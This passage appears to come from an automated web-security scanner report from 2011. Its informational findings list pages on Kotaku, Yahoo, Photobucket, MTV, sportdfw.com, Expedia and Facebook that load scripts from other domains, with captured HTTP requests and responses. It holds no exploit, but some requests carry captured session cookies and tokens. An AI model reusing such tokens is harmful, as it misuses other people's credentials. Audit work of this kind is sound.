Cookie: form_token=2657e8908f9ae46a1cb78d3013a193f8; SESSID_GANJA=hihvlpkf05v94s50dg0dnk9gi4; usrev=43127; ganjaPostlistView=false; __qca=P0-1910528491-1307963900267; ____GSV=dynamic; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; ad_url_login=0; ad_url_commenter=0; ad_url_star=0; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%228e63e5a4b1a3ef859caf7e001b06aec6%22%3Bs%3A4%3A%22time%22%3Bi%3A1307963363%3B%7D; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_CHK=31955d712532c281244ff18495a6c63d; welcome-box_count=1; interstitial_count=1

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:23:06 GMT
Server: Apache
X-Cookie-Set: 1
Last-Modified: Mon, 13 Jun 2011 11:00:08 GMT
ETag: "2e0776-3f6-4a595d28cde00"
Accept-Ranges: bytes
Cteonnt-Length: 1014
Cache-Control: max-age=30
Expires: Mon, 13 Jun 2011 11:23:36 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
GawkerApplicationHost: Ganja
GawkerHost: GM59 - Request took D=2722 at t=1307964186949759 on site kotaku.com (live)
GawkerApplication: ganja
Content-Type: text/html
Content-Length: 1014



<script type="text/javascript">
_qoptions = { tags:"Gawker Geek" };

...[SNIP]...
<script type="text/javascript" src="http://secure-au.imrworldwide.com/v60.js"></script>
...[SNIP]...

19.53. https://login.yahoo.com/config/login_verify2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.yahoo.com
Path:	/config/login_verify2

Issue detail

The response dynamically includes the following script from another domain:

https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_connection_2.8.2_inc_superads_capslock_loginmd5_min_12.js

Request

Response

19.54. http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.photobucket.com
Path:	/image/recent/Smirk_Dog/GIFS/MacSigDance.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.pbsrc.com/include/js/pkgs/27.3.6/base.js
http://static.pbsrc.com/include/js/pkgs/27.3.6/fullview.js
http://static.pbsrc.com/include/js/pkgs/27.3.6/savetoalbum.js
http://static.pbsrc.com/include/js/pkgs/27.3.6/sharelightbox.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:12 GMT
Server: Apache
Set-Cookie: flash=deleted; expires=Sun, 13-Jun-2010 11:02:11 GMT; path=/; domain=.photobucket.com
Set-Cookie: daily=referer%3Dwww.mavsmoneyball.com; expires=Tue, 14-Jun-2011 11:02:14 GMT; path=/; domain=.photobucket.com
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 57409

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<meta http-equiv="Content-Type"
...[SNIP]...
</script>

<script src="http://static.pbsrc.com/include/js/pkgs/27.3.6/base.js" type="text/javascript"></script>
<script src="http://static.pbsrc.com/include/js/pkgs/27.3.6/savetoalbum.js" type="text/javascript"></script>
<script src="http://static.pbsrc.com/include/js/pkgs/27.3.6/sharelightbox.js" type="text/javascript"></script>
<script src="http://static.pbsrc.com/include/js/pkgs/27.3.6/fullview.js" type="text/javascript"></script>
...[SNIP]...

19.55. http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moviesblog.mtv.com
Path:	/2011/06/12/game-of-thrones-spoiler-death-sean-bean/

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.polldaddy.com/p/5137314.js
http://widgets3.flux.com/Loader
http://widgets3.flux.com/context/short/D3FCFFFF0002D51D0002FFFFFCD3
http://www.google-analytics.com/urchin.js

Request

GET /2011/06/12/game-of-thrones-spoiler-death-sean-bean/ HTTP/1.1
Host: moviesblog.mtv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.2.8
Vary: Accept-Encoding
X-Cache-Term: short
X-Pingback: http://moviesblog.mtv.com/xmlrpc.php
Cache-Control: max-age=600
Date: Mon, 13 Jun 2011 11:22:38 GMT
Content-Length: 41841
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

...[SNIP]...


<script type="text/javascript" src="http://widgets3.flux.com/Loader" id="D3FCFFFF0002D51D0002FFFFFCD3"></script>
<script type="text/javascript" src="http://widgets3.flux.com/context/short/D3FCFFFF0002D51D0002FFFFFCD3"></script>
...[SNIP]...
<p><script type="text/javascript" charset="utf-8" src="http://static.polldaddy.com/p/5137314.js"></script>
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.56. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/solo/1@x06 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.sportsfanlive.com
Path:	/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/solo/1@x06

Issue detail

The response dynamically includes the following script from another domain:

http://www2.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=1000212071&adSize=728x90

Request

Response

19.57. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Left previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.sportsfanlive.com
Path:	/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Left

Issue detail

The response dynamically includes the following script from another domain:

http://www2.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=1000212071&adSize=160x600

Request

Response

19.58. http://oascentral.sportsfanlive.com/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Position2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.sportsfanlive.com
Path:	/RealMedia/ads/adstream_jx.ads/fansided.sportsfanlive.com/default/jx/thirdparty/1[INSERT-TIMESTAMP]@Position2

Issue detail

The response dynamically includes the following script from another domain:

http://www2.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs&affiliateId=1000212071&adSize=300x250

Request

Response

19.59. http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportdfw.com
Path:	/2011/06/13/10-observations-dallas-mavs-finals/

Issue detail

The response dynamically includes the following scripts from other domains:

http://apis.google.com/js/plusone.js
http://edge.quantserve.com/quant.js
http://partner.googleadservices.com/gampad/google_service.js
http://platform.twitter.com/widgets.js
http://s46.sitemeter.com/js/counter.js?site=s46fansided
http://w.sharethis.com/button/buttons.js
http://widgets.twimg.com/j/2/widget.js
http://www.google.com/recaptcha/api/challenge?k=6LfwLcISAAAAACH9NQnsyWBftRd2io5fqynbhWx3

Request

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:00:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Phusion_Passenger/2.2.15 mod_bwlimited/1.4 PHP/5.2.15
X-Powered-By: PHP/5.2.15
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=3, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Content-Type: text/html; charset=UTF-8
Content-Length: 83625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"
...[SNIP]...

<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

<script type="text/javascript"
src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LfwLcISAAAAACH9NQnsyWBftRd2io5fqynbhWx3"></script>
...[SNIP]...
<ul class="full">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s46.sitemeter.com/js/counter.js?site=s46fansided">
</script>
...[SNIP]...

19.60. http://sportdfw.com/aboutcontact-us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportdfw.com
Path:	/aboutcontact-us/

Issue detail

The response dynamically includes the following scripts from other domains:

http://apis.google.com/js/plusone.js
http://edge.quantserve.com/quant.js
http://partner.googleadservices.com/gampad/google_service.js
http://s46.sitemeter.com/js/counter.js?site=s46fansided
http://w.sharethis.com/button/buttons.js
http://widgets.twimg.com/j/2/widget.js

Request

GET /aboutcontact-us/ HTTP/1.1
Host: sportdfw.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=5; __unam=285a97b-13088a9730a-3676d392-1; __qca=P0-99083065-1307962866999; __gads=ID=cbb765a09f72e364:T=1307962868:S=ALNI_MZRITR-4U6A8ZRRg2WMhGZBr7HlCQ; __utmz=249201221.1307962995.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=249201221.1804733079.1307962867.1307962867.1307962867.1; __utmb=249201221.2.10.1307962867; __utmc=249201221

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Phusion_Passenger/2.2.15 mod_bwlimited/1.4 PHP/5.2.15
X-Powered-By: PHP/5.2.15
Vary: Cookie
X-Pingback: http://sportdfw.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 62437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"
...[SNIP]...

<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

<script type="text/javascript"
src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<ul class="full">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s46.sitemeter.com/js/counter.js?site=s46fansided">
</script>
...[SNIP]...

19.61. http://sportdfw.com/img/city/dallas/img/content-email-submit.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportdfw.com
Path:	/img/city/dallas/img/content-email-submit.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://apis.google.com/js/plusone.js
http://edge.quantserve.com/quant.js
http://partner.googleadservices.com/gampad/google_service.js
http://s46.sitemeter.com/js/counter.js?site=s46fansided
http://w.sharethis.com/button/buttons.js
http://widgets.twimg.com/j/2/widget.js

Request

GET /img/city/dallas/img/content-email-submit.gif HTTP/1.1
Host: sportdfw.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=5; __unam=285a97b-13088a9730a-3676d392-1; __qca=P0-99083065-1307962866999; __gads=ID=cbb765a09f72e364:T=1307962868:S=ALNI_MZRITR-4U6A8ZRRg2WMhGZBr7HlCQ

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:02:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Phusion_Passenger/2.2.15 mod_bwlimited/1.4 PHP/5.2.15
X-Powered-By: PHP/5.2.15
Vary: Cookie
X-Pingback: http://sportdfw.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 11:02:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 59152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"
...[SNIP]...

<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

<script type="text/javascript"
src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<ul class="full">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s46.sitemeter.com/js/counter.js?site=s46fansided">
</script>
...[SNIP]...

19.62. http://sportdfw.com/z-the-fort-worth-four/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportdfw.com
Path:	/z-the-fort-worth-four/

Issue detail

The response dynamically includes the following scripts from other domains:

http://apis.google.com/js/plusone.js
http://edge.quantserve.com/quant.js
http://partner.googleadservices.com/gampad/google_service.js
http://s46.sitemeter.com/js/counter.js?site=s46fansided
http://w.sharethis.com/button/buttons.js
http://widgets.twimg.com/j/2/widget.js

Request

GET /z-the-fort-worth-four/ HTTP/1.1
Host: sportdfw.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=5; __qca=P0-99083065-1307962866999; __gads=ID=cbb765a09f72e364:T=1307962868:S=ALNI_MZRITR-4U6A8ZRRg2WMhGZBr7HlCQ; __utmz=249201221.1307962995.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=249201221.1804733079.1307962867.1307962867.1307962867.1; __utmb=249201221.2.10.1307962867; __utmc=249201221; __unam=285a97b-13088a9730a-3676d392-2

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Phusion_Passenger/2.2.15 mod_bwlimited/1.4 PHP/5.2.15
X-Powered-By: PHP/5.2.15
Vary: Cookie
X-Pingback: http://sportdfw.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 64400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"
...[SNIP]...

<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

<script type="text/javascript"
src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<ul class="full">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s46.sitemeter.com/js/counter.js?site=s46fansided">
</script>
...[SNIP]...

19.63. http://sports.yahoo.com/nba/expertsarchive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sports.yahoo.com
Path:	/nba/expertsarchive

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307964051305165&transactionID=1307964051305165
http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307964051305165&transactionID=1307964051305165
http://amch.questionmarket.com/adsc/d692902/3/695561/randm.js
http://l.yimg.com/j/assets/eJx9kWFuhCAQhU-kooC46WEMi3RlVxjDQDfu6QvYJtq0_QV5883jMXPHZoum6WpRk3xbQE7aVxPYSn9oF2rfMtp17dv9CCpwTqtgwFXWuN8Z6YyV_yN3_L1Ka7qn-SpyMVCei6ilV_MoEQ2GJhXNfh07Qi5k6Ejb0-HoloJikC5gEnuWmOKygi8K43wovtf4eh3bgrzi2QYeRmdFDJxlZQarRwtTXHQmOaFDXzqNemh_7H0aN8HzqKACr8N8_reVTt7OnUp6iKiXoxaX00omg2oBjD6H61vByB7XWnDNhmuVIpZTzVo9yos9p-zyB2X0pVqNq4KXmb4lXJA0pIx7uZopf7UTrAztfdkg5jSCMloc10Vu2o_7ln6kHq8QAthv9RPVHctE.js?z&m

Request

Response

19.64. http://sports.yahoo.com/nba/news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sports.yahoo.com
Path:	/nba/news

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702
http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702
http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702
http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702
http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702
http://amch.questionmarket.com/adsc/d692902/3/695561/randm.js
http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m
http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/answers_badge_1.5.r143221;js/teamtracker.r143221.js?m
http://l.yimg.com/j/assets/js/video/dash-players/yep-player.r169686;js/video/dash-players/dash-players.r170778;js/video/dash-players/dash-players-init.r172129.js?m

Request

Response

19.65. http://sports.yahoo.com/nba/news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sports.yahoo.com
Path:	/nba/news

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307963074600541&transactionID=1307963074600541
http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307963074600541&transactionID=1307963074600541
http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307963074600541&transactionID=1307963074600541
http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307963074600541&transactionID=1307963074600541
http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307963074600541&transactionID=1307963074600541
http://amch.questionmarket.com/adsc/d692902/3/695561/randm.js
http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m
http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/answers_badge_1.5.r143221;js/teamtracker.r143221.js?m
http://l.yimg.com/j/assets/js/video/dash-players/yep-player.r169686;js/video/dash-players/dash-players.r170778;js/video/dash-players/dash-players-init.r172129.js?m

Request

Response

19.66. http://sports.yahoo.com/nba/news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sports.yahoo.com
Path:	/nba/news

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853703487&transactionID=1307962853703487
http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853703487&transactionID=1307962853703487
http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962853703487&transactionID=1307962853703487
http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962853703487&transactionID=1307962853703487
http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962853703487&transactionID=1307962853703487
http://amch.questionmarket.com/adsc/d692902/3/695561/randm.js
http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m
http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/answers_badge_1.5.r143221;js/teamtracker.r143221.js?m
http://l.yimg.com/j/assets/js/video/dash-players/yep-player.r169686;js/video/dash-players/dash-players.r170778;js/video/dash-players/dash-players-init.r172129.js?m

Request

Response

19.67. http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thesouthern.com
Path:	/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://cm.npc-lee.overture.com/partner/js/ypn.js
http://e.yieldmanager.net/script.js
http://edge.quantserve.com/quant.js
http://images.townnews.com/leetemplates.com/app/images/omniture/carbondale.js
http://stats.townnews.com/shared-content/stats/common/tracker.js
http://tweetmeme.com/i/scripts/button.js
http://w.sharethis.com/button/sharethis.js
http://www.paperg.com/jsfb/embed.php?pid=16509&bid=3958

Request

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 4172492
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Mon, 13 Jun 2011 11:01:02 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.12
X-TNCMS-Render-Time: 0.4017
X-PHP-Engine: enabled
Last-Modified: Mon, 13 Jun 2011 10:13:38 GMT
Real-Hostname: thesouthern.com
X-TNCMS-Served-By: cmsapp1
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 63930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="global/resources/styles/site.css" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</script>
<script src="http://e.yieldmanager.net/script.js" type="text/javascript"></script>
...[SNIP]...
<body>
<script type='text/javascript' src='http://stats.townnews.com/shared-content/stats/common/tracker.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
<div class="hide"><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=b1d8748b-b62f-4386-8fe9-64214c4421aa&type=website&buttonText=Share%20This%20Story&send_services=aim%2Csms&post_services=facebook%2Ctwitter%2Cdigg%2Cybuzz%2Cmyspace%2Cdelicious%2Cstumbleupon%2Creddit%2Cmixx%2Cfark%2Clinkedin%2Cfriendfeed"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://cm.npc-lee.overture.com/partner/js/ypn.js"></script>
...[SNIP]...
<div class="blox-core-html-asset">
   <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=16509&bid=3958"></script>
...[SNIP]...
<div id="blox-omniture" class="hide">
       <script type="text/javascript" src="http://images.townnews.com/leetemplates.com/app/images/omniture/carbondale.js"></script>
...[SNIP]...

   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19.68. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.expedia.com
Path:	/daily/promos/deals/summervacationsale/default.asp

Issue detail

The response dynamically includes the following script from another domain:

http://connect.facebook.net/en_US/all.js

Request

Response

19.69. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js

Request

Response

19.70. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js

Request

Response

